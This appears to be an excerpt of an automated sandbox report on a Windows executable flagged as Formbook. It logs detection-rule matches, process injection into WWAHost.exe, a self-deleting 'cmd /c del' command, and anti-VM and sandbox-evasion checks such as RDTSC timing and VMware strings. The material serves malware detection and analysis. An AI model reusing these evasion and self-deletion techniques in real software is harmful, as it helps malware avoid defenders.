            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA0EA5
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00401030
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C4B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C50
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C0C
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B493
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041CD71
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402D87
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402D90
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041CE59
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B7A6
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402FB0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113F900
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01154120
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120E824
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F1002
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A830
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114B090
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012020A8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012028EC
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202B28
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AB40
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116EBB0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F03DA
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FDBD2
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011EFA2B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012022AE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202D07
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01130D20
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01201D55
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01162581
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114D5E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012025DD
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114841F
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FD466
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01201FF1
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120DFCE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FD616
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01156E30
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202EF7
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222B28
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318EBB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03221FF1
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321DBD2
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03176E30
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032222AE
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222EF7
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315F900
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222D07
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03150D20
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03174120
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03221D55
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182581
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316D5E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032225DD
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316841F
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211002
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321D466
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316B090
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032220A8
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031820A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032228EC
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C0C
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C50
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C4B
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B493
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033CD71
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322D90
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322D87
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033CE59
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322FB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B7A6
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: String function: 0113B150 appears 54 times
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0315B150 appears 35 times
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.675137695.0000000001080000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718379211.0000000002E26000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.717394980.00000000013BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000000.674352218.0000000000760000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exeBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@18/12
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\JdtN8nIcLi8RQOi.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: JdtN8nIcLi8RQOi.exeReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: WWAHost.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
            Source: Binary string: mscorrc.pdb source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: JdtN8nIcLi8RQOi.exe, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.JdtN8nIcLi8RQOi.exe.6a0000.1.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.JdtN8nIcLi8RQOi.exe.6a0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BAD0F4 push ecx; retf
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041604B pushfd ; retf
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00407008 push esi; ret
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B3F2 push eax; ret
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B3FB push eax; ret
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B3A5 push eax; ret
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B45C push eax; ret
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0118D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031AD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00327008 push esi; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033604B pushfd ; retf
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B3A5 push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B3F2 push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B3FB push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B45C push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.21231975694
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: JdtN8nIcLi8RQOi.exe PID: 6596, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000003285E4 second address: 00000000003285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000032896E second address: 0000000000328974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe TID: 6604Thread sleep time: -50832s >= -30000s
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe TID: 6588Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6864Thread sleep time: -90000s >= -30000s
            Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6152Thread sleep time: -54000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000002.00000000.696371602.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000002.00000000.693540842.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.696371602.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: WWAHost.exe, 00000006.00000002.1029527940.000000000252E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000002.00000002.1037609731.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000002.00000000.696503730.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
